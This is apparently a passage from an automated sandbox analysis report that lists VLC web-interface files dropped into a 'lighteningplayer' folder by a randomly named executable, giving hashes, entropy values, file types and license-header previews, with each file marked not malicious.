                                                                                                                                                                                      Size (bytes):5360
                                                                                                                                                                                      Entropy (8bit):5.307361958508565
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:zS6Zi3y9+k0y4Hfyt1YPZ44URXIpQq2widzUiOzPHTjVq74rrhkKfJtdBtlyJpIH:SkEfyth6dzXrtfPFLhX5xj/wL/R8
                                                                                                                                                                                      MD5:F193295D687ACB2A49C8E00FC31A2C1F
                                                                                                                                                                                      SHA1:E4BC4A8F508F6C4AE6BF6EDC1A7A0F6A723F659E
                                                                                                                                                                                      SHA-256:DA4A1C9CD4E16D581F4DA4DA502EAEC9ED9608885F5A472F84FA14E0088EFE3A
                                                                                                                                                                                      SHA-512:E57285E315D17A48847AAF8823CF86AC8440E04D8910336CA7C4474452D18319D87442055B0AE952E070B29F904BDE31B6BFE6F47D977641E2D1893B708450B9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< mobile.html: VLC media player web interface - VLM..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2014 VLC authors and VideoLAN..< $Id$..<..< Authors: Brandon Brooks <bwbrooks -at- archmageinc -dot- com>..<..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...<..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...<..< You should have received a copy of the GNU General Public License..< along with this program; if not, write to the Free Software..< Foundatio
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\mobile_browse.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2444
                                                                                                                                                                                      Entropy (8bit):5.197808383249536
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:zd6Zi3y9+k0y4Hfyt1YPZD2qRIq2widzUioAzPHTjVqkKjyPB8jw:hkEfytQVuzeUGU
                                                                                                                                                                                      MD5:029FD5BAB64336366CF2A73C5EEA8CC8
                                                                                                                                                                                      SHA1:5F7653938FCDAFEDDC917148F04827CAD2F7FC07
                                                                                                                                                                                      SHA-256:F26665F543CBC3EF75C65A0F7749BD9287738233EE47D302177C57412BB1128B
                                                                                                                                                                                      SHA-512:3ED836E4B7C957AF3A6538BAFA355FDDA5AC681C4F67F0582F7BB21FEBE33B02A5B2A4A3A2901B72CB2F6EF5D0403F64C408C9429E9102B947D13FF37EE5F6F5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< mobile_browse.html: VLC media player web interface - VLM..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2014 VLC authors and VideoLAN..< $Id$..<..< Authors: Brandon Brooks <bwbrooks -at- archmageinc -dot- com>..<..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...<..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...<..< You should have received a copy of the GNU General Public License..< along with this program; if not, write to the Free Software..< Fo
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\mobile_equalizer.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2917
                                                                                                                                                                                      Entropy (8bit):5.2958269405515965
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:zX6ZTy9+k0y4Hfyt1YPZD2qR5uq2widzUioAzPHTjVqkKEwh4TP+kIgwNDbPs5gR:IkEfytQRuzeMwl84lFJj
                                                                                                                                                                                      MD5:F85830B0F0B962B8F55ECF1D40458764
                                                                                                                                                                                      SHA1:ADDB7CBCF05A430AF403D9028E6AA40D9D25E0E9
                                                                                                                                                                                      SHA-256:01BFC0624327C47CE84CA3E30A201E91E7411D708105E77E7811FC66D2E6A74E
                                                                                                                                                                                      SHA-512:ABDABEE66BD9E3F2504F06AC23C65D6AC471F3DB22AB89C1359C2D698EB82B6610906563800FEFEC6BE479F392A588C92CCDD286188075D5237167DE25BA42DA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< mobile_equalizer.html: VLC media player web interface - VLM..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2006 the VideoLAN team..< $Id$..<..< Authors: Brandon Brooks <bwbrooks -at- archmageinc -dot- com>..<..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...<..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...<..< You should have received a copy of the GNU General Public License..< along with this program; if not, write to the Free Software..< Founda
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2840
                                                                                                                                                                                      Entropy (8bit):5.297682048931486
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:zA6Zi3y9+k0y4Hfyt1YPZD2qR5u+2widzUioAzPHTjVqkhKYriHN4rDMt4lwoNeb:QkEfytQPuzkqiHWrXgb
                                                                                                                                                                                      MD5:6710285ADE2CE9718E59CF3A7E30BA64
                                                                                                                                                                                      SHA1:008160D49ED4395974A16547B69F3823986A4170
                                                                                                                                                                                      SHA-256:AB62EA350CE7FCEFFAD01786ACE1DDCE3D5CD5C5231047356C9550711F215C8A
                                                                                                                                                                                      SHA-512:F806FC8D21CAA7DE8FBD567012BD3DFAD185545D8C298CB56ADE3B2499343B53FC58DE0AA7527406062E8363A6347BA6DA966DFC76C525F3626A880FB53B0CE1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< mobile_view.html: VLC media player web interface - VLM..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2014 VLC authors and VideoLAN..< $Id$..<..< Authors: Brandon Brooks <bwbrooks -at- archmageinc -dot- com>..<..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...<..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...<..< You should have received a copy of the GNU General Public License..< along with this program; if not, write to the Free Software..< Foun
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5478
                                                                                                                                                                                      Entropy (8bit):4.9381892672605625
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:jMpnnCLuR9ZNdBsLZtyjogPAbF5ryb47zRl1QEn3c3eOR1hy/5BT/3ZGIab:jMniuR9DW3yj5AbF5rybez3dYI/5d/3S
                                                                                                                                                                                      MD5:3080834D2AEF61EECABA69B4112FB68C
                                                                                                                                                                                      SHA1:8D18104717CF528E22232F907A259C2A53EB4381
SHA-256:9E398F65B56CA09B0D41CBB5B788A8554B97B7C0CA2464BCB778371FCE95D625
SHA-512:DB658779B6886C3CCB2498808D74C331C2A1CBDAC4C8A9B3A35963AEAFF7A070A93636E423566BEF0805436F81B07285F98882B51E5F68A6D208B84C2AF1C562
Malicious:false
Preview: $Id$....This file describes commands available through the requests/ file:....Lines starting with < describe what the page sends back..Lines starting with > describe what you can send to the page....All parameters need to be URL encoded...Examples:.. # -> %23.. % -> %25.. + -> %2B.. space -> +.. .........Deprecation Notice:..---..The entire interface is moving to using <MRL> for input and output parameters and attributes..pl_play and in_enqueue previously accepted paths. This is still supported, but from 1.3 <MRL> will be required..where path attributes are provided in output, these should be ignored in favour of uri attributes..path support is scheduled to be removed entirely from 1.3..---....<root> (/)..===========......> Get album art for current input:.. /art (NB: not /requests/art)....> Get album art for any playlist input (available from API version 3):.. /art?item=123 (NB: not /requests/art)......status.xml or status.json..===========......< Get VLC status information, curre
C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.json
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:exported SGML document, ASCII text
Category:dropped
Size (bytes):1425
Entropy (8bit):4.825017063253334
Encrypted:false
SSDEEP:24:c2PbTUAA0fzRH2xZ/zhA1yRfOkHiluTbV2B+vDUYWCWmWcnWLWvbY+:c2PbwAVVW3zsyRJHiro/RR7nMKbY+
MD5:02A74626B57096A4F4F9DD77EBCBCDAE
SHA1:7DCC7AE4C60914DE9C34E8F6DA3DEDA286DE44A9
SHA-256:48D81D125C75148BBC3CE3C7B19152E734F5307B5B4B380688095A5E813E836B
SHA-512:7CEF62381AF33C019F3C7469D6F67C8CF7D46A1D41DF0B3F21BF06A6600AC1A89A6928537BB696BD71CB457E0369FA1A8B2A56C7D8BD4FCBC32C985ACA3B411E
Malicious:false
Preview: <?vlc --[[.vim:syntax=lua. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >.< status.xml: VLC media player web interface.< this should mirror the content and function of status.json.< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >.< Copyright (C) 2005-2009 the VideoLAN team.< $Id$.<.< Authors: Rob Jonson <rob -at- hobbyistsoftware -dot- com>.<.< This program is free software; you can redistribute it and/or modify.< it under the terms of the GNU General Public License as published by.< the Free Software Foundation; either version 2 of the License, or.< (at your option) any later version..<.< This program is distributed in the hope that it will be useful,.< but WITHOUT ANY WARRANTY; without even the implied warranty of.< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.< GNU General Public License for more details..<.< You should have received a copy of the GNU General Public License.< along with this progra
C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1758
Entropy (8bit):5.043702252839312
Encrypted:false
SSDEEP:48:ctJzSbUZXnE9+Y0y4Hf21YPV0Ot3nnCVKbYxaZBA:OVYEf2zOt3nn4K8xaZBA
MD5:70AA9A1262BE64C92F70D649498ABEBD
SHA1:A9A160F1CB6035271D6DCF820B5EF9D86BA50F00
SHA-256:66E21AD81541F4B1B405768B77EBBAD54F1D9D735AD07EBB7258D741301A239D
SHA-512:002AE525B966B2540642F23FAC9E2764C53D77985A9FF331E3E8D1A7CB448130B1287A8F237E3EC6875101EFA685082AE579C88B49710A99FF664E30C4454206
Malicious:false
Preview: <?xml version="1.0" encoding="utf-8" standalone="yes" ?<?vlc print'>'?>..<?vlc --[[..vim:syntax=lua.. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< browse.xml: VLC media player web interface..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2006 the VideoLAN team..< $Id$..< ..< Authors: Antoine Cellerier <dionoea -at- videolan -dot- org>..< ..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...< ..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...< ..< You should have received a copy of the GNU General Pu
C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.json
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:exported SGML document, ASCII text
Category:dropped
Size (bytes):1384
Entropy (8bit):4.8192626316401475
Encrypted:false
SSDEEP:24:eTZR0fzRH2xZ/zhA1yRfOkHiluTbV2B+vD+YWCWmWyWvsOW3:eFsVW3zsyRJHiroNRRfKL8
MD5:F49845331585BF2709690967A4A01E29
SHA1:0E64076296E5175C415417B33215524180D31453
SHA-256:064E318623B40CA2320694A06CD2E32C874475F70CDAF7A1CB5AB42D07953016
SHA-512:FC2FE93F14FB6D118134965D8B45A8BDEDACA7E7BDE528AB79172A052EE2403D15429F4417511A36BF2A5879393CEEF792D05B4DDC9F47616BF768D786BAD105
Malicious:false
Preview: <?vlc --[[.vim:syntax=lua. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >.< playlist.json: VLC media player web interface.< this should mirror the content of playlist.xml.< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >.< Copyright (C) 2005-2006 the VideoLAN team.< $Id$.<.< Authors: Rob Jonson <rob -at- hobbyistsoftware -dot- com>.<.< This program is free software; you can redistribute it and/or modify.< it under the terms of the GNU General Public License as published by.< the Free Software Foundation; either version 2 of the License, or.< (at your option) any later version..<.< This program is distributed in the hope that it will be useful,.< but WITHOUT ANY WARRANTY; without even the implied warranty of.< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.< GNU General Public License for more details..<.< You should have received a copy of the GNU General Public License.< along with this program; if not
C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):2331
Entropy (8bit):5.075950742581632
Encrypted:false
SSDEEP:48:ctJzGbUZVdI9+k0y4Hfyt1YPV0OAVcJurTeuVcpmuf5K3lv:ORkEfytzOkcmemcs3lv
MD5:E075693E85BCA004768E1F764B69E0EF
SHA1:A183BB845B1DD101CF6AD6F3B1538015E5ABE53E
SHA-256:73DA0C5CF3F992C8DA8572C84B8071F74AF18D0C980173395374C65660615F2C
SHA-512:80945B4932BBFE3767B85424825ACD0DF453FB22DD3B075F2CCD6372B3AFFDF527CF0CBB1E474B6B7B00189913D0B84009829FF2006C5D131E0109A2B92B7FCD
Malicious:false
Preview: <?xml version="1.0" encoding="utf-8" standalone="yes" ?<?vlc print'>'?>..<?vlc --[[..vim:syntax=lua.. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< playlist.xml: VLC media player web interface..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2006 the VideoLAN team..< $Id$..<..< Authors: Antoine Cellerier <dionoea -at- videolan -dot- org>..< Authors: Rob Jonson <rob -at- hobbyistsoftware -dot- com>..<..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...<..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details..
C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist_jstree.xml
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):3140
Entropy (8bit):4.931935836490905
Encrypted:false
SSDEEP:48:ctJzGbUZXnE9+Y0y4Hf21YPw7q8LgAgrXqYHLWxbTfCdYjLL96WQ:O5YEf23OLsL0
MD5:0163ED96652896F7717BDAA348897B58
SHA1:6D2E6828D05F735BFCA2846FE704E158977F06A8
SHA-256:5055393661DB15CCEF1D229A7C48334D7F20710F613519FE5994FC62723A5DDE
SHA-512:109EAC05CCF5729645237C41812310CA23C7D1AF24D0A897831EF7AEBD7434A3EC8E20C4DC08550826706AAE65609FD0A26EDF5FD5DF7BFC3EBE0303B106183F
Malicious:false
Preview: <?xml version="1.0" encoding="utf-8" standalone="yes" ?<?vlc print'>'?>..<?vlc --[[..vim:syntax=lua.. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< playlist.xml: VLC media player web interface..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2006 the VideoLAN team..< $Id$..< ..< Authors: Antoine Cellerier <dionoea -at- videolan -dot- org>..< ..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...< ..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...< ..< You should have received a copy of the GNU General
C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.json
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:exported SGML document, ASCII text
Category:dropped
Size (bytes):1427
Entropy (8bit):4.810529837134612
Encrypted:false
SSDEEP:24:c2PbTUAe0fXRH2xZ/zM1yRfOkHilCTbV2B+vDUYWCWmWqWG8WvT:c2PbwAzBW3zyyRJHiLo/RRLx8KT
MD5:299B8075ABD804616EDCC490A69C4AB1
SHA1:0677EE88E29376F9E51830150941C21EAA7A3C9D
SHA-256:5ED55825A158098FAB7419C620ED5641D7C70A4232A1FF1DE290E39E4517A358
SHA-512:A21EAC71A7621F99CCE25409CA96CE9B6FF6AA133DFE60D7A7021816101289CE36EE8DB25428F1FEF5D62688FE8520D1A78FF1DD6A075F957FCFA8C151118361
Malicious:false
Preview: <?vlc --[[.vim:syntax=lua. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >.< status.xml: VLC media player web interface.< this should mirror the content and function of status.json.< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >.< Copyright (C) 2005-2009 the VideoLAN team.< $Id$.< .< Authors: Rob Jonson <rob -at- hobbyistsoftware -dot- com>.< .< This program is free software; you can redistribute it and/or modify.< it under the terms of the GNU General Public License as published by.< the Free Software Foundation; either version 2 of the License, or.< (at your option) any later version..< .< This program is distributed in the hope that it will be useful,.< but WITHOUT ANY WARRANTY; without even the implied warranty of.< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.< GNU General Public License for more details..< .< You should have received a copy of the GNU General Public License.< along with this pr
C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):2789
Entropy (8bit):4.918627655586448
Encrypted:false
SSDEEP:48:chJz12PbUZenIe9+Y0y4Hf21YP90Ot3Px6FKluqKOkI4naMxt07qW7oQDN:Q40YEf2FOt3Px6FKcqKOkIqBxt0eW7o2
MD5:33FBF9082A0A74A2A6966B662467035E
SHA1:34718B6D476247BF865775D6D6B014A8460287DA
SHA-256:D87C74AB32C37024FFC895BEC2DC58AD12512D985246F4B6D62611E7A82700A8
SHA-512:BCD66F17B2B7F00694D2C9B85B696CCDA7FDEED4802E950FE2B6DB2AE81AE9E0E2D23B0AC45F33A078824A5CA29B9019729E2A25D59297343CF2908AD0BF4587
Malicious:false
Preview: <?xml version="1.0" encoding="utf-8" standalone="yes" ?<?vlcprint'>'?>..<?vlc --[[..vim:syntax=lua.. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< status.xml: VLC media player web interface..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2009 the VideoLAN team..< $Id$..< ..< Authors: Antoine Cellerier <dionoea -at- videolan -dot- org>..< ...Rob Jonson <rob -at- hobbyistsoftware -dot- com>..< ..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...< ..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...< ..<
C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4597
Entropy (8bit):4.714477328356298
Encrypted:false
SSDEEP:48:cGz5bUZXnE9+Y0y4Hf21YPh/2WMVFGF0RzbrYGvzAGGGdGGGZr/Ia6PyhPJ7MS5L:JoYEf2wuWMV+0RzbIPJ7jMgBx
MD5:C70833388885744160D133922000BB5C
SHA1:89E46132D95BD36CAE556AB5BAB80B703FB4B24B
SHA-256:55F3552B708A944A84C7F4A717846338DF957DBCC7A1898FB8B4E36B64EA62CA
SHA-512:B8154E17FB7499A07891EE47D38D8525179B860FD63F6C17D90761696EEFC5ABBE6064413590C5F8500A8AB6095960AE5D1B9F06EED422C06C011E335C0B4EBA
Malicious:false
Preview: <?xml version="1.0" encoding="utf-8" standalone="yes" ?<?vlc print '>'..--[[..vim:syntax=lua.. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< vlm.xml: VLC media player web interface..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2006 the VideoLAN team..< $Id$..< ..< Authors: Antoine Cellerier <dionoea -at- videolan -dot- org>..< ..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...< ..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...< ..< You should have received a copy of the GNU General Public Licen
C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm_cmd.xml
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1469
                                                                                                                                                                                      Entropy (8bit):4.953178434463786
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:2dNXDvobUZvPo6hPO99khwJ0yMOkHfl6TbVp1M+v6PX2+iJ6RF:cBAbUZXnE9+Y0y4Hf21YPWc
                                                                                                                                                                                      MD5:391869E7081B739B497DBBAB0E5332ED
                                                                                                                                                                                      SHA1:38A7F8C9F764B7A5382E4CF082AE5B252F0599FF
                                                                                                                                                                                      SHA-256:ED276E48CC38B7B064C4AEC41AEC890879A940804A0A26FA02CD444DA782DE14
                                                                                                                                                                                      SHA-512:2124A69B12AAAC3BEF6E36AD021D16A112BC40622EB4FD0303C792573A9052A12CA2993E0644F3E2D91AA0B6152CEEE578F7F24BB877060F984FC220A9C9E0A8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8" standalone="yes" ?<?vlc print '>'..--[[.. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< vlm_cmd.xml: VLC media player web interface..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2006 the VideoLAN team..< $Id$..< ..< Authors: Antoine Cellerier <dionoea -at- videolan -dot- org>..< ..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...< ..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...< ..< You should have received a copy of the GNU General Public License..< along
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\view.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3587
                                                                                                                                                                                      Entropy (8bit):5.417202799956201
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:zD6Zi3y9+k0y4Hfyt1YPZZcqlidVioAN9NcHNcjVNG4rrNNE/554xpISz4l7kQMK:3kEfytUc5wPctcjxrBNOvtFXrGcR
                                                                                                                                                                                      MD5:E44DFC7766433D1424C1058ACCF5FCC7
                                                                                                                                                                                      SHA1:2017D30B08BE58EFDAFFC17AA9DF7E75C8C92393
                                                                                                                                                                                      SHA-256:D87E429E5D342C3216305B90EF8B919A7CC81D7FD103285F270E751E9048F1C3
                                                                                                                                                                                      SHA-512:EFF5C676EE1011CB3A102626E99F9BBA46C45483A606C2357711D39C3DA3BC8B60F8227475780BCCDD16F38BF38066C653C85B01F3A0B093A1463A53F30CD5DC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< view.html: VLC media player web interface - VLM..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2014 VLC authors and VideoLAN..< $Id$..<..< Authors: Brandon Brooks <bwbrooks -at- archmageinc -dot- com>..<..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...<..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...<..< You should have received a copy of the GNU General Public License..< along with this program; if not, write to the Free Software..< Foundation,
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\vlm.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1823
                                                                                                                                                                                      Entropy (8bit):5.103989865748562
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:lmIA+F6ZiTnE9+k0y4Hfyt1YP2N40pcEFNm7:1ASkEfytrHm7
                                                                                                                                                                                      MD5:AD74E2B62F7F0B0DCF3027E57B2E35BC
                                                                                                                                                                                      SHA1:7CAD78F43D2297E47AE02861DA79BB44EB193BCF
                                                                                                                                                                                      SHA-256:F4CC8D30E07025277DBC6B6FC7684AA8813C7EF5B2B32938E87C38E1AC3DF080
                                                                                                                                                                                      SHA-512:30B338F37D3E87787257B0C3340BBF0AD9EEA5DDA4A02336566292C7C65A6A3E14423F8F9E8239EDDF85FF1BD47E1E0839F8809A542FE9D8EE08033E0D042259
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.... - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< vlm.html: VLC media player web interface - VLM..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2014 VLC authors and VideoLAN..< $Id$..< ..< Authors: Antoine Cellerier <dionoea -at- videolan -dot- org>..< ..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...<..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...<..< You should have received a copy
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\vlm_export.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):308
                                                                                                                                                                                      Entropy (8bit):4.897599071945427
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:jrOVGXacFYnzgLeYwFabmFwgqbtF6n/VcXknC05ZIs1Noo0y/:jrOV3qYsEaocsVcU/ZIpy/
                                                                                                                                                                                      MD5:40671579947F74D8826D641C94814B23
                                                                                                                                                                                      SHA1:127E2B856C1E4CD0EB3A541E627962CD570295C5
